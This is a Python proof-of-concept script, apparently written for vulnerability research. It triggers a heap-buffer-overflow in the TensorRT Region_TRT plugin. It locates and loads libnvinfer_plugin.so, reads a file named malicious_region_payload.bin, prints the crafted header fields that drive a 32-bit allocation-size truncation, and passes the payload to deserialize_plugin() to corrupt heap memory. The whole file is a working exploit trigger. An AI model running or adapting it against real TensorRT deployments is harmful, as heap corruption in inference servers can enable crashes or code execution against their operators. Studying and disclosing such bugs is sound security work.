File size: 4,621 Bytes
398500f | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 | #!/usr/bin/env python3
"""
Trigger TensorRT Region plugin heap overflow via deserialize_plugin().
This script loads a malicious serialized payload and feeds it to
RegionPluginCreator.deserialize_plugin(), which internally calls
Region::Region(buffer, length) — the vulnerable deserialization constructor.
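Requirements:
  - TensorRT Python package (pip install tensorrt)
  - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source:
    https://github.com/NVIDIA/TensorRT

For ASan detection, build the OSS plugins with:
    cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc) nvinfer_plugin
Because the Python interpreter itself is not ASan-instrumented, the ASan
runtime usually has to be preloaded when running this script, e.g.:
    LD_PRELOAD=$(gcc -print-file-name=libasan.so) python3 trigger_deserialize.py

Usage:
    python3 gen_payload.py                     # generates malicious_region_payload.bin
    python3 trigger_deserialize.py [payload]   # triggers the heap overflow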
"""
import ctypes
import struct
import sys
import os
import glob
def find_and_load_plugin_lib():
    """Locate libnvinfer_plugin.so and return its path, or None if not found.

    Despite its name, this function does not load the library; the caller is
    expected to load it (e.g. with ctypes).  Candidates are tried in order:
    a few well-known build/container locations (the first one is relative to
    the current working directory), then every non-empty LD_LIBRARY_PATH
    entry.  Each candidate is expanded with glob.glob() and must also pass
    os.path.exists(), so dangling symlinks are skipped.
    """
    lib_name = "libnvinfer_plugin.so"
    candidates = [
        # Built from TensorRT OSS source
        "TensorRT/build/out/libnvinfer_plugin.so",
        "/content/TRT/build/out/libnvinfer_plugin.so",
        # Docker container
        "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
    ]
    # Also search LD_LIBRARY_PATH (empty entries are ignored)
    candidates += [
        os.path.join(entry, lib_name)
        for entry in os.environ.get("LD_LIBRARY_PATH", "").split(":")
        if entry
    ]
    # Lazily walk the glob matches in candidate order; stop at the first real file.
    matches = (hit for pattern in candidates for hit in glob.glob(pattern))
    return next((hit for hit in matches if os.path.exists(hit)), None)
def _load_oss_plugins(plugin_path):
    """Load the plugin library at *plugin_path* and register its plugin creators.

    Returns True when initLibNvInferPlugins() reports success. Returns False
    when the library cannot be loaded, does not export the entry point, or
    the call itself reports failure.
    """
    try:
        # RTLD_GLOBAL makes the library's symbols visible to libraries loaded later.
        lib = ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL)
        init_plugins = lib.initLibNvInferPlugins
    except (OSError, AttributeError) as e:
        print(f"[-] Could not load {plugin_path}: {e}")
        return False
    # Declare the C prototype
    #   bool initLibNvInferPlugins(void* logger, const char* libNamespace)
    # so that None is passed as a NULL pointer and the 1-byte bool result is
    # read correctly. With ctypes' default int restype, the upper bytes of the
    # return register are undefined.
    init_plugins.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    init_plugins.restype = ctypes.c_bool
    return init_plugins(None, b"")


def _find_region_creator(trt):
    """Return the registered "Region_TRT" plugin creator, or None if absent."""
    for creator in trt.get_plugin_registry().all_creators:
        if creator.name == "Region_TRT":
            return creator
    return None


def _print_payload_header(payload):
    """Print the header fields decoded from the start of *payload* (display only).

    Layout as read here:
    - six little-endian int32 values (C, H, W, num, classes, coords) at offset 0;
    - flag bytes at offsets 24..31;
    - an int32 at offset 32, which this script labels smTreeTemp->n.

    Payloads shorter than 32 bytes print nothing; payloads shorter than
    36 bytes skip the smTreeTemp->n line.
    """
    if len(payload) < 32:
        return
    C, H, W, num, classes, coords = struct.unpack_from("<6i", payload, 0)
    flags = list(payload[24:32])
    print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}")
    print(f"[*] Flags: softmaxTree={flags[0]} leaf={flags[1]}")
    if len(payload) >= 36:
        n_val = struct.unpack_from("<i", payload, 32)[0]
        print(f"[*] smTreeTemp->n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})")
        # NOTE(review): the 32-bit truncation shown below is this script's model
        # of the allocation size; confirm against the plugin's allocateChunk().
        print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{(n_val * 4) & 0xFFFFFFFF:08x} (truncated)")


def main():
    """Feed a serialized payload to RegionPluginCreator.deserialize_plugin().

    The payload path is taken from argv[1] and defaults to
    "malicious_region_payload.bin". The process exits with status 1 if the
    payload file, the tensorrt package, or the Region_TRT creator is missing.
    Exceptions raised by deserialize_plugin() are printed rather than propagated.
    """
    payload_file = sys.argv[1] if len(sys.argv) > 1 else "malicious_region_payload.bin"
    if not os.path.exists(payload_file):
        print(f"[-] {payload_file} not found. Run gen_payload.py first.")
        sys.exit(1)
    with open(payload_file, "rb") as f:
        payload = f.read()
    print(f"[+] Loaded {payload_file}: {len(payload)} bytes")

    # Load TensorRT (imported lazily so a missing package gives a clear message)
    try:
        import tensorrt as trt
    except ImportError:
        print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
        sys.exit(1)
    print(f"[+] TensorRT {trt.__version__}")

    # Load OSS plugin library (contains Region_TRT); fall back to whatever the
    # default registry already provides if it is absent or fails to initialize.
    plugin_path = find_and_load_plugin_lib()
    if plugin_path:
        print(f"[+] Loading plugin lib: {plugin_path}")
        if not _load_oss_plugins(plugin_path):
            print("[!] Plugin library initialization failed, trying default registry...")
    else:
        print("[!] OSS plugin library not found, trying default registry...")

    region_creator = _find_region_creator(trt)
    if region_creator is None:
        print("[-] Region_TRT plugin not found in registry.")
        print("    Build TensorRT OSS plugins first:")
        print("    git clone https://github.com/NVIDIA/TensorRT.git")
        print("    cd TensorRT && mkdir build && cd build")
        print("    cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF")
        print("    make -j$(nproc) nvinfer_plugin")
        sys.exit(1)
    print(f"[+] Region_TRT v{region_creator.plugin_version}")

    _print_payload_header(payload)
    print()
    print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...")
    print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow")
    print("[!] Expected: heap-buffer-overflow (visible with ASan)")
    print()

    try:
        bad_plugin = region_creator.deserialize_plugin("region", payload)
    except Exception as e:  # top-level boundary: report the binding's error
        print(f"[!] Exception during deserialization: {e}")
    else:
        print(f"[+] Plugin deserialized (returned: {bad_plugin})")
        print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
        print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")
if __name__ == "__main__":
    # Script entry point; main() returns None, so the exit status stays 0
    # unless main() itself calls sys.exit() with a non-zero code.
    sys.exit(main())
|